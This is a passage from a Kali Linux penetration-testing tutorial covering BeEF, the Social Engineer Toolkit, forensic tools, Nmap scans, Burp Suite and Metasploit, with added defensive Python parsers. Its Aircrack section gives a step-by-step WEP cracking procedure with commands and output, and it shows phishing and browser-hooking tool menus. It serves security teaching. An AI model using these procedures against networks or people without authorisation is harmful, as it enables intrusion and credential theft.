To interact with a hooked browser simply left-click it, a new tab will appear. Each hooked browser tab
has a number of sub-tabs, described below:

Main: Display information about the hooked browser after you've run some command modules.
Logs: Displays recent log entries related to this particular hooked browser.
Commands: This tab is where modules can be executed against the hooked browser. This is (cut off in the screenshot)


The left panel of BeEF will reflect the browsers in which the BeEF hook is loaded and ready. You will
notice different tabs at the top. Let us take a quick look at them.


+ Getting Started: It's the same welcome page that we just read in the
preceding paragraphs.


+ Logs: It shows the different browsers' actions.

+ Current Browser: This is the main tab to look for. It contains details about
the current working browser. It contains six different subtabs with additional
information and actions.





[Screenshot: the Current Browser tab for a hooked browser at 127.0.0.1, with the Details, Logs, Commands, Rider, XssRays and Ipec subtabs. Details lists Category: Browser (13 items): Browser Name: Firefox, Browser Version: 18, Browser UA String: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1, Browser Plugins: Gnome Shell Integration, Window Size: Width: 994, Height: 545, Java Enabled: No, VBScript Enabled: No, Has Flash: Yes, Has GoogleGears: No, Has WebSockets: Yes, Has ActiveX: No, Session Cookies: Yes, Persistent Cookies: Yes; and Category: Hooked Page (5 items): Page Title: BeEF Basic Demo, Page URI: http://127.0.0.1:3000/demos/basic.html, Page Referrer: http://127.0.0.1:3000/ui/panel, Hostname/IP: 127.0.0.1. Each entry is marked "Initialization".]


These subtabs are as follows:

+ Details: It represents every detail of the browser: its plugins, hooked pages,
and so on.

+ Logs: It represents the logs of the browser's actions.

+ Commands: This contains different modules that we can execute against the
browser.

+ Rider: This tab allows us to submit arbitrary HTTP requests on behalf of the
hooked browser.

+ XssRays: This looks for any possibility of an XSS attack on the hooked browser.


We just saw, in short, the basic information of BeEF. You can start playing with BeEF against your
own web applications, or you can start with the demo lessons added with BeEF to gain more
knowledge of the framework.
Social Engineer Toolkit


Social Engineer Toolkit (SET) is a popular command-line tool that can frame attack scenarios
to target specific users. It builds up the scenario based on its custom set of options and allows the
attacker to leverage its power and build the attack vector. The success of the attack vector is
completely dependent on the human element; hence the name Social Engineer Toolkit.

To launch SET, navigate to Applications | Kali Linux | Exploitation tools | Social Engineering 
Toolkit | se-toolkit. 


[Screenshot of the SET terminal banner, which gives the homepage, the IRC channel on irc.freenode.net and the note "The Social-Engineer Toolkit is a product of TrustedSec.", followed by the main menu:]

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit


You can select your preferred attack mode from the options menu to frame the attack. Let us
select 1.


Here you will find several attack options to select from. Let us select Spear-Phishing Attack 
Vectors and then select Create Social Engineering Template. This option enables you to build 
your own SET template to launch attacks. 
[Screenshot of the SET terminal after selecting option 1. Below the banner ("Join us on irc.freenode.net in channel #setoolkit", "The Social-Engineer Toolkit is a product of TrustedSec.") the Social-Engineering Attacks menu reads:]

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.


Further, you can also launch website-based attack vectors, Java applet attacks, and so on. SET
is a very useful and friendly tool that provides a variety of options for penetration testing. SET
also leverages the power of the Metasploit Framework to build payloads, Meterpreter connections,
shells, and so on.


Working with forensics tools 


Kali has an exhaustive collection of free forensic tools that can be used to investigate an infected
system. Forensics plays a completely different role compared to penetration testing. In forensic
analysis, we try to analyze the root cause of a break-in, whereas in penetration testing we
perform the actual process of breaking in. Let us go for a quick ride through some of the important
forensic tools available in Kali Linux.
Autopsy Forensic Browser

Autopsy is a very useful tool for forensic analysts. It is a GUI-based tool that generates a
detailed report of events that occurred on an operating system in a timeline fashion. This
makes it easier to relate one incident to another. It is a fast and robust tool to investigate
systems for any malicious behavior. Some of its common features include the following:

+ Timeline analysis 

+ Filesystem analysis 

+ Extracting history, cookies, and bookmarks from various browsers 

+ Hash filtering 


Autopsy can be launched by navigating to Applications | Kali Linux | Forensics | Digital 
Forensics | Autopsy. 


You can launch the GUI from the browser by opening the localhost:9999/autopsy/ URL.


[Screenshot: Iceweasel with the Autopsy Forensic Browser tab open at localhost:9999/autopsy.]

Once the GUI is loaded, you can build a new case by clicking on New Case. A new window, as
shown in the following screenshot, opens:


[Screenshot: the Autopsy New Case window.]


Fill in the initial details such as Case Name, Description, and Investigator Names. At the 
final stage, you will be asked to add an image. Provide the complete path of the image to be 
investigated along with the image type and the import method. Now you are all set to begin 
investigating your target. 


Most of the properties of the image under investigation will be listed in the left-hand side pane 
of the GUI. The Images node reflects the directory structure. The Views node reflects the data 
from a file type. The Results node shows the output from the Ingest modules. The Ingest 
modules analyze multiple files in a prioritized order. This is how you can travel through the 
complete system to figure out the timeline changes in the system and identify any potential 
threat. Autopsy is a very handy tool in cases where the root of infection is not known to us. 
The Sleuth Kit


The Sleuth Kit (TSK) is a collection of libraries that can be used to investigate disk images for 
digital forensics. Libraries of The Sleuth Kit can be merged with other forensics tools so that 
they can work in conjunction to perform forensics. Autopsy is a graphical version of The Sleuth 
Kit. Some of the important tools of this kit are as follows: 


+ icat: This tool displays the contents of a file from the image

+ blkls: This tool is used to extract unallocated disk space

+ fsstat: This tool is used to determine the fragment location of information

+ fls: This tool is used to list files, including deleted files, from the image


These are some useful tools present in this kit that can be used under various situations to 
perform forensic investigations. 
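The timeline that Autopsy displays is built from the same data that The Sleuth Kit's fls tool emits in its "body" format (one line per file with the atime, mtime, ctime and creation time). The following is an added example, not code from the book or from The Sleuth Kit project, that parses a constructed body-format sample, sorts every timestamp into a mactime-style timeline, and flags files whose modification time is earlier than their creation time, a common sign of tampered timestamps. The file names and timestamps are constructed for illustration.

```python
import datetime as dt

# Constructed sample in The Sleuth Kit "body" format (what `fls -m` produces and
# what Autopsy's timeline is built from); not taken from a real disk image.
# Fields: MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime
SAMPLE_BODY = """\
0|/etc/passwd|131|r/rrw-r--r--|0|0|1812|1372371600|1372281600|1372281600|1372281600
0|/tmp/.x|204|r/rrwxr-xr-x|0|0|40960|1372372200|1372371900|1372372200|1372371900
0|/var/log/auth.log|305|r/rrw-r-----|0|43|52411|1372372300|1372372300|1372372300|1372281000
0|/usr/bin/ls|410|r/rrwxr-xr-x|0|0|110080|1372372100|1262304000|1372371950|1372371950
"""


def parse_body(text):
    """Parse body-format lines into dicts; blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split("|")
        if len(f) != 11:
            raise ValueError("malformed body line: " + line)
        entries.append({
            "name": f[1], "inode": f[2], "mode": f[3], "size": int(f[6]),
            "atime": int(f[7]), "mtime": int(f[8]),
            "ctime": int(f[9]), "crtime": int(f[10]),
        })
    return entries


def build_timeline(entries):
    """Return (timestamp, MACB flags, name) tuples, oldest first, like mactime.

    Several timestamps of one file that fall on the same second are merged
    into one event whose flags show which of m/a/c/b changed then."""
    events = {}
    for e in entries:
        for field, flag in (("mtime", "m"), ("atime", "a"),
                            ("ctime", "c"), ("crtime", "b")):
            ts = e[field]
            if ts == 0:            # 0 means "unknown" in the body format
                continue
            events.setdefault((ts, e["name"]), set()).add(flag)
    timeline = []
    for (ts, name), flags in sorted(events.items()):
        macb = "".join(ch if ch in flags else "." for ch in "macb")
        timeline.append((ts, macb, name))
    return timeline


def timestomp_candidates(entries):
    """Files modified before they were created: a classic timestamp-tampering sign."""
    return [e["name"] for e in entries
            if e["crtime"] and e["mtime"] < e["crtime"]]


def fmt(ts):
    """Render a Unix timestamp as UTC, the way a report would show it."""
    return dt.datetime.fromtimestamp(ts, dt.timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


if __name__ == "__main__":
    ents = parse_body(SAMPLE_BODY)
    for ts, macb, name in build_timeline(ents):
        print(fmt(ts), macb, name)
    print("timestomp candidates:", timestomp_candidates(ents))
```

In the sample, /usr/bin/ls carries a 2010 modification time but a 2013 creation time, so it surfaces as a candidate even though its timeline position alone would make it look like an untouched system binary.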


This was an overview of some of the important tools that can be used under various situations 
to perform different tasks ranging from information gathering to forensic investigation. Kali has 
a collection of over 300 tools. Covering all of them is beyond the scope of this book but a good 
understanding of the tools listed in this section can be of great help under any situation. In the 
next section of this book, we will cover some of the tools in a detailed and elaborate manner. 
Top 5 features you need to know about


As you start to use Kali Linux, you will realize that there are a wide variety of things that you can 
do with it. This section will teach you all about the most commonly performed tasks and features 
used in Kali. 


Information gathering with Nmap 


Information gathering is the first step towards penetration testing. In this phase, we try and
collect as much information about our target as possible. Nmap is the most preferred tool for
scanning and gathering information. Nmap can be launched by opening the console and passing
the nmap command. This will display a list of the different parameters and options that can be used
with Nmap. Let us work with a few of them.


+ To scan a single IP, use the following command:
root@kali:~# nmap 192.168.56.1


The output of this command is shown in the following screenshot: 


[Screenshot of the scan output; the port numbers are illegible except for the last line:]

root@kali:~# nmap 192.168.56.1

Starting Nmap 6.25 ( http://nmap.org ) at 2013-06-27 14:58 EDT
Nmap scan report for 192.168.56.1
Host is up (0.0049s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE
         open  msrpc
         open  netbios-ssn
         open  microsoft-ds
         open  iss-realsecure
         open  apex-mesh
         open  NFS-or-IIS
         open  LSA-or-nterm
         open  [illegible]
         open  unknown
         open  sbl
1094/tcp open  rootd

Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds



+ To scan a range of IP addresses in a network, use the following command:
root@kali:~# nmap 192.168.56.1-255


+ To scan a particular port number over a target, use the following command:
root@kali:~# nmap 192.168.56.1 -p 80


+ To scan a range of ports over the entire subnet for a specific port range, use the
following command:
root@kali:~# nmap 192.168.56.0/24 -p 1-1000


+ To exclude a specific host or multiple hosts from the scan, use the following commands:
nmap 192.168.56.0/24 --exclude 192.168.1.5
nmap 192.168.56.0/24 --exclude 192.168.1.5,192.168.1.254


+ To perform a speedy scan, use the following command:
nmap -F 192.168.56.1


+ To scan for the operating system and its version, use the following commands:
nmap -A 192.168.56.1
nmap -v -A 192.168.56.1


+ To check if a firewall is in place at the target network/IP, use the following command:
nmap -sA 192.168.1.254


+ In case of firewalls, Nmap has a specific parameter to scan the target, which can be
done using the following command:
nmap -PN 192.168.1.1


+ To increase the verbosity and see whether all the packets are sent/received, use the
following command:
nmap --packet-trace 192.168.1.1


+ To detect different services running on the remote target, use the following command:
nmap -sV 192.168.56.1


+ To scan a target using TCP ACK (PA) or TCP SYN (PS) packets, use the following
commands:
nmap -PA 192.168.56.1
nmap -PS 192.168.56.1


+ To launch a stealthy scan, we will use the TCP SYN scan using the following command:
nmap -sS 192.168.56.1


+ To find out various TCP services running on the remote target, we use the TCP connect
scan using the following command:
nmap -sT 192.168.56.1


+ For a UDP scan, we use the following nmap command:
nmap -sU 192.168.56.1


+ All these scan results can be saved directly to a text file using the following command:
nmap -sU 192.168.56.1 > scan.txt


These were some of the important commands that can be handy at the time of information 
gathering and scanning. Nmap provides the feature of linking these different scan parameters 
into a single scan so as to make the process more advanced and sophisticated. 
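A scan like the ones above is only useful once its output is compared against what should be exposed. The following is an added example, not code from the book or from the Nmap project, that parses Nmap's normal text output (the format shown in the screenshot above, here a constructed two-host sample) into a per-host port list and reports every open port that is not on a per-host allowlist, which is how a defender turns a scan into an exposure check. The sample hosts, ports and the EXPECTED allowlist are constructed for illustration.

```python
import re

# Constructed sample in Nmap's normal (-oN) output format, modelled on the scan
# shown in this section; it is not output captured from a real host.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 6.25 ( http://nmap.org ) at 2013-06-27 14:58 EDT
Nmap scan report for 192.168.56.1
Host is up (0.0049s latency).
Not shown: 995 filtered ports
PORT     STATE  SERVICE
135/tcp  open   msrpc
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp open   ms-wbt-server
8080/tcp closed http-proxy
Nmap scan report for 192.168.56.20
Host is up (0.0010s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Nmap done: 2 IP addresses (2 hosts up) scanned in 5.05 seconds
"""

# Constructed allowlist: (port, protocol) pairs each host is expected to expose.
EXPECTED = {
    "192.168.56.1": {(445, "tcp")},
    "192.168.56.20": {(22, "tcp"), (80, "tcp")},
}

# "Nmap scan report for <host>" starts a host block; when Nmap resolves a name
# it prints "name (ip)", and the first token (the name) is what we key on.
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# Port lines look like "445/tcp  open  microsoft-ds"; the header "PORT STATE
# SERVICE" does not start with a digit, so it never matches.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap(text):
    """Map each scanned host to a list of (port, proto, state, service)."""
    hosts = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service = m.groups()
            hosts[current].append((int(port), proto, state, service))
    return hosts


def unexpected_open_ports(hosts, allowlist):
    """Open ports that the allowlist does not grant to that host."""
    findings = []
    for host, ports in hosts.items():
        allowed = allowlist.get(host, set())
        for port, proto, state, service in ports:
            if state == "open" and (port, proto) not in allowed:
                findings.append((host, port, proto, service))
    return findings


if __name__ == "__main__":
    scan = parse_nmap(SAMPLE_NMAP_OUTPUT)
    for host, port, proto, service in unexpected_open_ports(scan, EXPECTED):
        print(f"{host}: unexpected open {port}/{proto} ({service})")
```

Ports that Nmap reports as closed or filtered are kept in the parsed data but never flagged, so the check only fires on what is actually reachable; run it on a saved scan (nmap ... > scan.txt, as above) to diff the real exposure against the intended one.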


Breaking wireless passwords using Aircrack 


In this section we will cover details of how to break wireless passwords using Kali Linux. We 
already covered the use of the Fern WIFI cracker in the Fern WIFI Cracker section; we saw that 
this is an automated tool to crack passwords but its scope is limited. Here we will perform each 
step manually to see how Wi-Fi passwords can be cracked. Before we begin, we have to ensure 
that our wireless card supports packet injection. You can search your Wi-Fi hardware on Google 
to see if it supports packet injection. Several USB-based wireless cards are available that can do 
this task. 


Follow these steps to begin cracking Wi-Fi passwords: 


1. Identify the wireless network. 


We will begin by checking our wireless network's interface using the 
iwconfig command. 


[Screenshot: lsusb lists the NetGear, Inc. WNA1100 Wireless-N 150 [Atheros AR9271] USB adapter alongside the VMware, Inc. Virtual Mouse and Virtual USB Hub and the Linux Foundation 2.0 and 1.1 root hubs. iwconfig then shows wlan0 (IEEE 802.11bgn, ESSID:off/any, Mode:Managed, Access Point: Not-Associated, Tx-Power=20 dBm, Retry long limit:7, RTS thr:off, Fragment thr:off, Encryption key:off, Power Management:off), while the other interfaces report "no wireless extensions".]

The wireless card will be listed by default as wlan0. If the wireless card is not enabled,
use the following command:


root@kali:~# ifconfig wlan0 up


2. Begin scanning. 


To scan the nearby in-range Wi-Fi networks, pass the following command and analyze 
the output: 


root@kali:~# iwlist wlan0 scan


The output will list several details of in-range Wi-Fi networks, such as their ESSID name, 
MAC address, and encryption key status. 


[Screenshot of the scan output:]

root@kali:~# iwlist wlan0 scan
wlan0     Scan completed :
          Cell 01 - Address: AC:F1:DF:F0:99:FD
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=24/70  Signal level=-86 dBm
                    Encryption key:on
                    ESSID:"DLink"
                    Bit Rates:[illegible in the screenshot]
                              24 Mb/s; 36 Mb/s; 54 Mb/s
                    Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s
                    Mode:Master
                    Extra: Last beacon: 2216ms ago
                    IE: Unknown: 0005444C696E6B
                    IE: Unknown: 010887848B967430466C
                    IE: Unknown: 030106
                    IE: Unknown: 2A0104
                    IE: Unknown: 2F0104
                    IE: Unknown: 37640C171860
                    IE: Unknown: [illegible]
                    IE: Unknown: [illegible]


You can now select your target from the list and keep a note of its details, such as the 
channel number and MAC address that will be used in later steps. 


3. Setting up the monitoring mode. 


In this step we will configure our wireless card for its monitoring mode. This will enable
the card to examine all data packets flowing in the air. To do this, we will use
airmon-ng. It is a command-line tool that sets the wireless card to monitor mode. We
will pass the following command:


root@kali:~# airmon-ng start wlan0


[Screenshot of the airmon-ng output:]

root@kali:~# airmon-ng start wlan0


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

Name
NetworkManager
dhclient
dhclient
wpa_supplicant


Interface       Chipset         Driver

wlan0           Atheros AR9271  ath9k - [phy0]
                                (monitor mode enabled on mon0)


Now, to verify whether the wireless card is active in monitor mode or not,
use the ifconfig command. You will notice a new interface with the name
mon0. This is our monitoring interface.

4. Capturing packets. 


Now we are all set to begin capturing the data packets flowing across our target
network. We will be using airodump-ng for this. The command format will be
as follows:


airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0


Once you pass the command along with the respective parameter details, you will 
notice that the wireless card will begin capturing data packets from our target network. 


 CH  6 ][ Elapsed: 3 mins ][ 2013-06-30 00:35

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 AC:F1:DF:F0:99:FD  -85   0      188        1    0   6  54e  WEP  WEP         DLink

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe



Let it run for a few minutes, until it has captured over 10,000 beacons.

5. Cracking the password.


Once you have closed the packet capture process, you will notice that some new files
will be created in your root directory. The important file is the *.cap file (crack-01.cap)
that will be used in cracking the password. Next, we will use aircrack-ng
along with a dictionary to begin cracking the password. A common dictionary that
can be used is darkc0de.lst; it can be downloaded from
http://www.filecrop.com/darkc0de.lst.html.


Once the dictionary is downloaded, you can pass the following command: 


root@kali:~# aircrack-ng crack-01.cap -w darkc0de.lst


[Screenshot of the aircrack-ng output:]

root@kali:~# aircrack-ng crack-01.cap -w darkc0de.lst
fopen(dictionary) failed: No such file or directory
fopen(dictionary) failed: No such file or directory
Opening crack-01.cap
Read 591 packets.

   #  BSSID              ESSID                     Encryption

   1  AC:F1:DF:F0:99:FD  DLink                     WEP (26 IVs)

Choosing first network as target.

Opening crack-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 26 ivs.

                                 Aircrack-ng 1.1

                 [00:00:03] Tested 983041 keys (got 26 IVs)

   KB    depth   byte(vote)


After several minutes, if a dictionary match is found, it will be reflected on the terminal. 
The success of this attack depends on the password strength and the dictionary used 
for the attack. It is always advisable to capture as many packets as possible before 
launching aircrack-ng. 
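Step 2 above identifies nearby networks from iwlist output, and the airodump-ng ENC column shows why that matters: a network still using WEP (or no encryption at all) is the one the attacks in this section and in the Fern section apply to. The following is an added example, not code from the book or from the aircrack-ng project, that parses iwlist scan output into one record per cell and classifies each network as OPEN, WEP, WPA or WPA2 from the "Encryption key" line and the WPA/RSN information elements, so an administrator can inventory which of their access points need to be moved off weak settings. The sample scan is constructed (the first cell reuses the DLink access point from the screenshots; the other addresses are made-up locally administered MACs).

```python
import re

# Constructed iwlist scan output modelled on step 2; not a real capture.
SAMPLE_SCAN = """\
wlan0     Scan completed :
          Cell 01 - Address: AC:F1:DF:F0:99:FD
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=24/70  Signal level=-86 dBm
                    Encryption key:on
                    ESSID:"DLink"
                    Mode:Master
          Cell 02 - Address: 02:00:00:00:00:02
                    Channel:11
                    Quality=50/70  Signal level=-60 dBm
                    Encryption key:on
                    ESSID:"HomeNet"
                    Mode:Master
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
                        Pairwise Ciphers (1) : CCMP
                        Authentication Suites (1) : PSK
          Cell 03 - Address: 02:00:00:00:00:03
                    Channel:1
                    Quality=40/70  Signal level=-70 dBm
                    Encryption key:off
                    ESSID:"CoffeeShop"
                    Mode:Master
          Cell 04 - Address: 02:00:00:00:00:04
                    Channel:6
                    Quality=30/70  Signal level=-80 dBm
                    Encryption key:on
                    ESSID:"Legacy"
                    Mode:Master
                    IE: WPA Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (1) : TKIP
                        Authentication Suites (1) : PSK
"""

CELL_RE = re.compile(r"Cell \d+ - Address: ([0-9A-Fa-f:]{17})")


def parse_iwlist(text):
    """One dict per cell: bssid, essid, channel and the security hints seen."""
    cells = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        m = CELL_RE.search(line)
        if m:
            cur = {"bssid": m.group(1).upper(), "essid": "", "channel": None,
                   "encrypted": False, "wpa": False, "wpa2": False}
            cells.append(cur)
            continue
        if cur is None:
            continue
        if line.startswith("Channel:"):          # "Frequency:... (Channel 6)" does not match
            cur["channel"] = int(line.split(":", 1)[1])
        elif line.startswith("ESSID:"):
            cur["essid"] = line.split(":", 1)[1].strip('"')
        elif line.startswith("Encryption key:"):
            cur["encrypted"] = line.endswith("on")
        elif line.startswith("IE: IEEE 802.11i/WPA2"):   # RSN information element
            cur["wpa2"] = True
        elif line.startswith("IE: WPA Version"):         # vendor WPA1 element
            cur["wpa"] = True
    return cells


def security(cell):
    """Classify a cell; encryption on with no WPA/RSN element means WEP."""
    if not cell["encrypted"]:
        return "OPEN"
    if cell["wpa2"]:
        return "WPA2"
    if cell["wpa"]:
        return "WPA"
    return "WEP"


def weak_networks(cells):
    """Networks an administrator should fix first: open or WEP."""
    return [(c["essid"], c["bssid"], security(c))
            for c in cells if security(c) in ("OPEN", "WEP")]


if __name__ == "__main__":
    for essid, bssid, kind in weak_networks(parse_iwlist(SAMPLE_SCAN)):
        print(f"{kind:<5} {bssid} {essid}")
```

The WPA (TKIP) cell is reported but not flagged as weak here; tighten the policy in weak_networks if your environment requires WPA2 everywhere.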


Web app penetration testing with Burp Suite 


Burp Suite is another popular tool that is widely preferred for auditing web applications. It comes 
in both free and commercial versions with variations in features. Kali Linux comes preinstalled 
with the free version of Burp Suite. It can be launched from Applications | Kali Linux | Web 
Applications | Web Application Fuzzers | Burp Suite. 


Some of the key features of Burp Suite include the following:


+ An intercepting proxy that can analyze different requests/responses through the browser

+ An application-aware spider to crawl the contents of the application

+ Web app scanners for identifying weaknesses and vulnerabilities

+ Creating and saving the workspace

+ Extensibility of the tool by integrating custom plugins


Burp Suite is a combination of several tools under a single roof that work in conjunction with 
each other. Let us understand some of the common functionalities of Burp Suite. 


Burp proxy 


Burp proxy is an intercepting proxy that reads all the requests/responses sent through a browser.
It acts as a man-in-the-middle between the browser and the web application. To begin working with
Burp proxy, we will have to change the browser's network settings to route the traffic through the
proxy. Launch the network settings of the browser and give the proxy address as localhost and the
port as 8000.





[Screenshot: the Iceweasel Connection Settings dialog ("Configure Proxies to Access the Internet") with Manual proxy configuration selected, HTTP Proxy 127.0.0.1 and the port filled in, "Use this proxy server for all protocols" unchecked, the SSL, FTP and SOCKS proxy fields empty, SOCKS v5 selected, and No Proxy for: localhost, 127.0.0.1.]

Now the browser is all set to communicate through HTTP via Burp proxy. You can view the
proxy preferences by selecting the Proxy tab and choosing the Options subtab. The intercept 
will reflect any communication captured over HTTP via the browser. The History tab shows 
the timeline of captured communications. 


[Screenshot: Burp Suite Free Edition v1.5, Proxy tab, Options subtab. Under Proxy Listeners: "Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use one of the listeners as its proxy server." with a table of Running / Interface / Invisible / Redirect / Certificate (Per-host). Under Intercept Client Requests: "Use these settings to control which requests are stalled for viewing and editing in the Intercept tab." with "Intercept requests based on the following rules" and the rules: File extension Does not match (^gif$|^jpg$|^png$|^css$|^js$|...), Or Request Contains parameters, Or HTTP method Does not match (get|post), And URL Is in target scope.]


You can change your proxy preferences from the Options tab. Let us now discuss the working of 
Burp spider. 


Burp Spider 

Burp Spider is a crawling tool that finds every web page linked to a website. It begins with
crawling from the home page, or whichever page is given as input, and crawls it by following
the hyperlinks connected with that page. It finally represents the complete chain in a tree form.
Burp Spider can be configured from the Options tab. You can select the maximum depth to be
traversed by the crawler, HTML fields to crawl, application logins, thread count, and so on.
Burp Intruder

Burp Intruder is a powerful tool to automate customized attacks to be launched against the
web application. It allows the user to build up a template of an attack vector and perform the
operations in an automated manner.


Burp Intruder has four important tabs namely Target, Positions, Payloads, and Options. 


[Screenshot: Burp Suite Free Edition v1.5, Intruder tab with the Target, Positions, Payloads and Options subtabs. Attack Target: "Configure the details of the target for the attack." Host: 127.0.0.1, Port: 80, Use HTTPS unchecked.]


The Target tab is used for selecting the target address of the application. For local testing,
it can be set to 127.0.0.1.


The Positions tab is used for selecting the positions where the attack template should be applied. 
It can be either a request, form field, parameter, and so on. There are various kinds of attack 
templates, such as sniper attack, battering ram attack, pitchfork attack, and cluster bomb. 


The Payloads tab is used to set the attack vector that needs to be applied at the selected
positions. For example, an SQL injection attack can be applied by selecting the positions
as the login form and selecting the payload as the injection strings.
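The four attack templates differ only in how positions and payload sets are combined, and that combination decides how many requests a run sends, which is also exactly what the target's access log, WAF or rate limiter sees. The following is an added example, not code from the book or from Burp Suite, that models a request template with Burp's section-sign markers around each position (§base value§) and generates what each template would produce. The template string and the payload lists are constructed placeholders.

```python
import re
from itertools import product

# Burp marks each payload position in the request template as "\u00a7base\u00a7".
# This template and the payload lists in the test are constructed for illustration.
TEMPLATE = "user=\u00a7alice\u00a7&pass=\u00a7secret\u00a7"
POS_RE = re.compile("\u00a7([^\u00a7]*)\u00a7")


def positions(template):
    """Base values of the marked positions, left to right."""
    return POS_RE.findall(template)


def render(template, values):
    """Substitute one value per marked position and drop the markers."""
    values = list(values)
    if len(values) != len(positions(template)):
        raise ValueError("need exactly one value per payload position")
    it = iter(values)
    return POS_RE.sub(lambda m: next(it), template)


def sniper(template, payloads):
    """One payload set; each position in turn receives every payload while
    the other positions keep their base value. Requests: positions * payloads."""
    base = positions(template)
    for i in range(len(base)):
        for p in payloads:
            values = list(base)
            values[i] = p
            yield render(template, values)


def battering_ram(template, payloads):
    """One payload set; the same payload is placed in every position at once.
    Requests: len(payloads)."""
    n = len(positions(template))
    for p in payloads:
        yield render(template, [p] * n)


def pitchfork(template, payload_sets):
    """One set per position, stepped in parallel (like zip).
    Requests: the length of the shortest set."""
    for combo in zip(*payload_sets):
        yield render(template, combo)


def cluster_bomb(template, payload_sets):
    """One set per position, every combination (Cartesian product).
    Requests: the product of the set lengths, which grows quickly."""
    for combo in product(*payload_sets):
        yield render(template, combo)


def request_counts(template, payload_sets):
    """Requests each template would send; sniper and battering ram use only
    the first set, the other two use one set per position."""
    n = len(positions(template))
    first = len(payload_sets[0])
    counts = {"sniper": n * first, "battering_ram": first,
              "pitchfork": min(len(s) for s in payload_sets), "cluster_bomb": 1}
    for s in payload_sets:
        counts["cluster_bomb"] *= len(s)
    return counts


if __name__ == "__main__":
    sets = [["a", "b"], ["x", "y", "z"]]
    print(request_counts(TEMPLATE, sets))
    for req in cluster_bomb(TEMPLATE, sets):
        print(req)
```

With two positions, two and three payloads respectively, sniper sends 4 requests, battering ram 2, pitchfork 2 and cluster bomb 6; with realistic wordlists the cluster bomb count is the product of the list sizes, which is why a run of that kind stands out so clearly in server logs.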


The Options tab can be used to apply additional settings such as the thread count, retries, 
and storing results. 


This was a quick tutorial covering some of the basic features of Burp Suite. It is highly 
recommended to implement the tool in a practical way against any web application to 
further understand its functioning. 
Metasploit Exploitation Framework


Metasploit is a free, open source penetration testing framework started by H. D. Moore in 2003 
and was later acquired by Rapid7. The current stable versions of the framework are written using 
the Ruby language. It has the world's largest database of tested exploits and receives more than 
a million downloads every year. It is also one of the most complex projects built in Ruby to date. 
It comes in both free and commercial license product forms. 


Metasploit is based on a modular architecture, and all its modules and scripts are integrated with
the framework in the form of modules. This makes it fairly easy to integrate any new custom
module with the framework and leverage its functionalities.


Features of Metasploit 
The following are some of the features of Metasploit: 


+ Framework base: Metasploit has a rich base that provides much of the functionality
required during penetration testing. Some of its base functions include logging,
configuration, database storage, Meterpreter scripting, and so on.


+ Auxiliary modules: This is one of the major features of Metasploit. Auxiliary modules 
are specific function modules that can perform a variety of tasks both pre and post 
exploitation. Some of its chief functionalities include scanning, information gathering, 
launching specific attacks, OS detection, service detection, and so on. 


+ Packaged tools: Metasploit comes with several handy tools that further enhance
the penetration testing experience. These include tools to create standalone
payloads and encode them with different encoders, database connectivity,
a GUI interface, and so on.


+ Third-party plugins: Metasploit can integrate with several third-party tools and use
their results to build its own attack structure. Results from tools such as Nmap,
Nessus, and NeXpose can be imported and used directly within the framework.


+ Open source: The free version of Metasploit is open source, so it can be fully extended 
and modified as needed. 


Metasploit can be launched by navigating to Applications | Kali Linux | Top 10 security tools | 
Metasploit Framework. 


Once the console is loaded, you will notice the msf > prompt, which indicates that Metasploit
is now ready to receive your commands.


To start penetration testing using Metasploit, we need a target system. Let us launch a quick
Nmap scan to find the live systems on our network. msfconsole passes commands it does not
recognise to the underlying shell, so Nmap can be run straight from the msf > prompt (the
db_nmap command does the same and also imports the results into Metasploit's database when
one is connected). We will use the following command to launch Nmap:


msf > nmap 192.168.56.1/24


Nmap scan report for 192.168.56.100
Host is up (0.00032s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:19:37:2B (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.000011s latency).
All 1000 scanned ports on 192.168.56.101 are closed

Nmap scan report for 192.168.56.102
Host is up (0.0012s latency).
All 1000 scanned ports on 192.168.56.102 are filtered
MAC Address: 08:00:27:82:14:25 (Cadmus Computer Systems)

Nmap done: 256 IP addresses (4 hosts up) scanned in 33.11 seconds
msf >





In the preceding output, you can see that Nmap has detected four live hosts. Let us target
